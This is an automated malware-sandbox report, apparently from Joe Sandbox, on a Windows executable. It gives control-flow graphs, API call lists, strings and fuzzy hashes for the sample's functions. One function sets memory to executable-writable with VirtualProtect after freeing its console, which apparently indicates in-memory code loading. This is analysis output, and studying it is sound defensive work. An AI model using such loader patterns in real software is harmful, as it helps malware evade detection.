                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseHandle_strlen$CreateMessagePostQuitReadSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3694359222-0
                                                                                                                                                                                                                                              • Opcode ID: ecffd8ae03e64a41bdcf22bf9ec72b11b7691081ed17b9eb672bf207882dc162
                                                                                                                                                                                                                                              • Instruction ID: 523c54e84acf6899f5ee67360669bb5fb4de767b994e69c06bad99ad1d4436b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecffd8ae03e64a41bdcf22bf9ec72b11b7691081ed17b9eb672bf207882dc162
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60918872924321ABC314DF64EC85A2BBBE5FF99350F15092DF8858B351E730D960CB92

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 002220E8
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002220F9
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0022214A
                                                                                                                                                                                                                                                • Part of subcall function 0022D0B6: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 0022D0C2
                                                                                                                                                                                                                                                • Part of subcall function 0022D0B6: GetExitCodeThread.KERNEL32(?,?), ref: 0022D0DB
                                                                                                                                                                                                                                                • Part of subcall function 0022D0B6: CloseHandle.KERNEL32(?), ref: 0022D0ED
                                                                                                                                                                                                                                                • Part of subcall function 00233E7D: CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 00233EC6
                                                                                                                                                                                                                                                • Part of subcall function 00233E7D: GetLastError.KERNEL32 ref: 00233ED2
                                                                                                                                                                                                                                                • Part of subcall function 00233E7D: __dosmaperr.LIBCMT ref: 00233ED9
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 002221AF
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 002221E9
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 002221F0
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 002221F7
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00222204
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00222213
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFileLastNameObjectSingleWait__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 686914455-0
                                                                                                                                                                                                                                              • Opcode ID: 88f0d27d7e33b3a5a0214a91e4d552489945643e263ce74022912feb74a86080
                                                                                                                                                                                                                                              • Instruction ID: 1013450a05749b4f4227301631fc39a85d268647b1047850f91b89b6b547fff7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88f0d27d7e33b3a5a0214a91e4d552489945643e263ce74022912feb74a86080
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231EAB1A60321BBE7207FE0BC07F9A76A49F45B40F044418FA4C6B1C5EAB19574CB97

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 131 23b8b2-23b8be 132 23b950-23b953 131->132 133 23b8c3-23b8d4 132->133 134 23b959 132->134 136 23b8e1-23b8fa LoadLibraryExW 133->136 137 23b8d6-23b8d9 133->137 135 23b95b-23b95f 134->135 138 23b960-23b970 136->138 139 23b8fc-23b905 GetLastError 136->139 140 23b979-23b97b 137->140 141 23b8df 137->141 138->140 145 23b972-23b973 FreeLibrary 138->145 143 23b907-23b919 call 23eeb4 139->143 144 23b93e-23b94b 139->144 140->135 142 23b94d 141->142 142->132 143->144 148 23b91b-23b92d call 23eeb4 143->148 144->142 145->140 148->144 151 23b92f-23b93c LoadLibraryExW 148->151 151->138 151->144
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,439473B7,?,0023B9C1,?,?,00000000), ref: 0023B973
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                              • Opcode ID: d4cccbc1855d307a3b7bf5be4c47e850d7a1a139ccac137ecc744e01a2c1b45b
                                                                                                                                                                                                                                              • Instruction ID: 3cbd70f9f200289031854e3fd5a0426be057d20a68fd37b401bec59be8cfd047
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4cccbc1855d307a3b7bf5be4c47e850d7a1a139ccac137ecc744e01a2c1b45b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21D5B2A61316BBC7239F20EC45B5A7768DF517B1F250110EB15A72D0D770EE10CAD0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 152 2214c0-221533 call 238870 155 221542-22154c 152->155 156 221535-22153f 152->156 157 221556-22155c 155->157 158 22154e-221551 155->158 156->155 160 22155e-221560 157->160 161 22157c-221588 157->161 159 2216f6-221717 158->159 163 221750-221792 call 223120 call 223190 call 22e6da 159->163 164 221719-221720 call 22baae 159->164 160->161 165 221562-221576 call 222940 160->165 166 221622-221637 call 22b367 161->166 167 22158e-221598 161->167 177 221722-221724 call 223b30 164->177 178 221729-221734 164->178 165->159 165->161 173 22163a-22164f 166->173 167->166 170 22159e-2215a3 167->170 175 2215db-2215f3 170->175 179 2216d1-2216d4 173->179 180 221655-22165f 173->180 181 2215b0-2215bc 175->181 182 2215f5-2215fc 175->182 177->178 186 221736 178->186 187 22173b-22174f call 22986f 178->187 188 2216df-2216f4 179->188 180->179 185 221661-221666 180->185 195 2215c2-2215d9 181->195 200 2216d6-2216db 181->200 182->181 189 2215fe-22160d 182->189 192 2216a1-2216b5 185->192 186->187 188->159 189->195 197 221670-22167c 192->197 198 2216b7-2216be 192->198 195->175 201 22160f-221620 195->201 197->200 204 22167e-22169f 197->204 198->197 202 2216c0-2216cf 198->202 200->188 201->166 202->204 204->179 204->192
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: bef29eb9e1002477c7a4ac3214dce25128568efe424c9e451561c9add047277b
                                                                                                                                                                                                                                              • Instruction ID: 82988ad68c79db18b242f50c53359a42bfeebd168a9b49aece4534a4da223995
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bef29eb9e1002477c7a4ac3214dce25128568efe424c9e451561c9add047277b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8791AD702102109FDB14CF69D494F2AB7E6FF89314F1886A8E9468F396D735EC66CB41

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00221000: _strlen.LIBCMT ref: 00221067
                                                                                                                                                                                                                                              • FreeConsole.KERNELBASE(?,?,?,00254808,ios_base::badbit set), ref: 00221AE1
                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(0025601C,00000549,00000040,?), ref: 00221B30
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00221B66
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleExitFreeProcessProtectVirtual_strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 4233975149-3882152299
                                                                                                                                                                                                                                              • Opcode ID: 738abd748b3f7d122996e8d97c67de2e8527cbe825e355c32675207cc15bd028
                                                                                                                                                                                                                                              • Instruction ID: 531b4d0c00fc90dc0c0e0fe688feca721b7065b8429bcea3ffc46949b8da6554
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 738abd748b3f7d122996e8d97c67de2e8527cbe825e355c32675207cc15bd028
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28014C35A50214BBDB007BA5BC07FAF7764EB54756F404020FD08B71C2F571AA348AD9

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 218 233e7d-233e88 219 233e8a-233e9d call 236211 call 2368fc 218->219 220 233e9e-233eb1 call 233f0e 218->220 226 233eb3-233ed0 CreateThread 220->226 227 233edf 220->227 229 233ed2-233ede GetLastError call 236237 226->229 230 233eee-233ef3 226->230 231 233ee1-233eed call 233f5e 227->231 229->227 232 233ef5-233ef8 230->232 233 233efa-233efe 230->233 232->233 233->231
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 00233EC6
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00233ED2
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00233ED9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744730728-0
                                                                                                                                                                                                                                              • Opcode ID: afb18ff725926459d2f57c768b0fc303bfecec3d7f0c53036b4c4cc68f6e3f0c
                                                                                                                                                                                                                                              • Instruction ID: 6927d71fd7dbac19b7816a1c9968a1c93c7751533deb1dea0d56a96254d094b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afb18ff725926459d2f57c768b0fc303bfecec3d7f0c53036b4c4cc68f6e3f0c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C015EB692020ABFDF15DFA5DC0AAAE7BB8EF40755F104058F80196160EB71CF60DB90

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 238 242520-242542 239 242735 238->239 240 242548-24254a 238->240 243 242737-24273b 239->243 241 242576-242599 240->241 242 24254c-24256b call 236aa5 240->242 245 24259f-2425a5 241->245 246 24259b-24259d 241->246 251 24256e-242571 242->251 245->242 247 2425a7-2425b8 245->247 246->245 246->247 249 2425ba-2425c8 call 2412d0 247->249 250 2425cb-2425db call 24284d 247->250 249->250 256 242624-242636 250->256 257 2425dd-2425e3 250->257 251->243 258 24268d-2426ad WriteFile 256->258 259 242638-24263e 256->259 260 2425e5-2425e8 257->260 261 24260c-242622 call 2428ca 257->261 266 2426af-2426b5 GetLastError 258->266 267 2426b8 258->267 262 242640-242643 259->262 263 242679-242686 call 242cf9 259->263 264 2425f3-242602 call 242c91 260->264 265 2425ea-2425ed 260->265 276 242605-242607 261->276 271 242665-242677 call 242ebd 262->271 272 242645-242648 262->272 283 24268b 263->283 264->276 265->264 273 2426cd-2426d0 265->273 266->267 270 2426bb-2426c6 267->270 277 242730-242733 270->277 278 2426c8-2426cb 270->278 288 242660-242663 271->288 279 2426d3-2426d5 272->279 280 24264e-24265b call 242dd4 272->280 273->279 276->270 277->243 278->273 284 2426d7-2426dc 279->284 285 242703-24270f 279->285 280->288 283->288 289 2426f5-2426fe call 23629d 284->289 290 2426de-2426f0 284->290 291 242711-242717 285->291 292 242719-24272b 285->292 288->276 289->251 290->251 291->239 291->292 292->251
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 002428CA: GetConsoleOutputCP.KERNEL32(439473B7,00000000,00000000,?), ref: 0024292D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00237097,?), ref: 002426A5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00237097,?,002372DB,00000000,?,00000000,002372DB,?,?,?,00254DE0,0000002C,002371C7,?), ref: 002426AF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2915228174-0
                                                                                                                                                                                                                                              • Opcode ID: 546d2d81b48cf3caeae82451e43db35f01afd79462e57446d173b746b79592b5
                                                                                                                                                                                                                                              • Instruction ID: b907cf1ea3e661fede66b36964e226b9d8bf9adedd2ad596d99e6ad71b2d7e3f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 546d2d81b48cf3caeae82451e43db35f01afd79462e57446d173b746b79592b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB61C171D2011AEFDF19CFA9D944EEEBBB9AF09304F950145F800A7251D371DA29CBA0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 295 242cf9-242d4e call 22e300 298 242d50 295->298 299 242dc3-242dd3 call 22986f 295->299 300 242d56 298->300 302 242d5c-242d5e 300->302 304 242d60-242d65 302->304 305 242d78-242d9d WriteFile 302->305 306 242d67-242d6d 304->306 307 242d6e-242d76 304->307 308 242d9f-242daa 305->308 309 242dbb-242dc1 GetLastError 305->309 306->307 307->302 307->305 308->299 310 242dac-242db7 308->310 309->299 310->300 311 242db9 310->311 311->299
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0024268B,00000000,002372DB,?,00000000,?,00000000), ref: 00242D95
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0024268B,00000000,002372DB,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00237097), ref: 00242DBB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 442123175-0
                                                                                                                                                                                                                                              • Opcode ID: 5fda31e291c464baa1219a9e46367bb28bcea34b3dba7ea94d543af91d9cbe95
                                                                                                                                                                                                                                              • Instruction ID: d9de83528f2cbed38e54f9d0810f85afeda13de5bbf7ed394eef444a13bce94c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fda31e291c464baa1219a9e46367bb28bcea34b3dba7ea94d543af91d9cbe95
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C217C30E10219DBCB19CF2ADC80AE9B7B9AB49302B5444A9E906D7211D6309E968FA4

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 312 23c3d2-23c3d7 313 23c3d9-23c3f1 312->313 314 23c3f3-23c3f7 313->314 315 23c3ff-23c408 313->315 314->315 316 23c3f9-23c3fd 314->316 317 23c41a 315->317 318 23c40a-23c40d 315->318 319 23c474-23c478 316->319 322 23c41c-23c429 GetStdHandle 317->322 320 23c416-23c418 318->320 321 23c40f-23c414 318->321 319->313 323 23c47e-23c481 319->323 320->322 321->322 324 23c456-23c468 322->324 325 23c42b-23c42d 322->325 324->319 327 23c46a-23c46d 324->327 325->324 326 23c42f-23c438 GetFileType 325->326 326->324 328 23c43a-23c443 326->328 327->319 329 23c445-23c449 328->329 330 23c44b-23c44e 328->330 329->319 330->319 331 23c450-23c454 330->331 331->319
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0023C2C1,00255160), ref: 0023C41E
                                                                                                                                                                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0023C2C1,00255160), ref: 0023C430
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                                                                                                              • Opcode ID: e395d8cdfb03e6797f21007f6fe4cc3a71387834d5bc82b18ff3a868e0499356
                                                                                                                                                                                                                                              • Instruction ID: 34b946a2df601d2e82e620496d37cc70558a19a3930edfa1c0cbff22cd7e0968
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e395d8cdfb03e6797f21007f6fe4cc3a71387834d5bc82b18ff3a868e0499356
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E71106F15247424AC7308E3E9CAC232BAA4A756370F380729D2F6F26F2C670C966D744

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00254C30,0000000C), ref: 00233FA8
                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00233FAF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1611280651-0
                                                                                                                                                                                                                                              • Opcode ID: cf708c5f36496e100713618835aec572a4a13e600ccabbb9d8b14382404873b7
                                                                                                                                                                                                                                              • Instruction ID: d7d16dbf4e3534efc8ca0b3d213442262766e9eb5259a2c029753db7b775d068
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf708c5f36496e100713618835aec572a4a13e600ccabbb9d8b14382404873b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0C2B1920209AFDF01EFB0E80EA6E7B75FF40342F20414AF40197691CB759A60CFA5

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 351 22af05-22af1f 352 22af21-22af23 351->352 353 22af28-22af30 351->353 354 22b001-22b00e call 22986f 352->354 355 22af32-22af3c 353->355 356 22af51-22af55 353->356 355->356 364 22af3e-22af4f 355->364 358 22af5b-22af6c call 22b795 356->358 359 22affd 356->359 367 22af74-22afa8 358->367 368 22af6e-22af72 358->368 363 22b000 359->363 363->354 366 22afca-22afcc 364->366 366->363 374 22afaa-22afad 367->374 375 22afce-22afd6 367->375 369 22afbb call 22a866 368->369 373 22afc0-22afc7 369->373 373->366 374->375 378 22afaf-22afb3 374->378 376 22afeb-22affb 375->376 377 22afd8-22afe9 call 237f3a 375->377 376->363 377->359 377->376 378->359 380 22afb5-22afb8 378->380 380->369
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
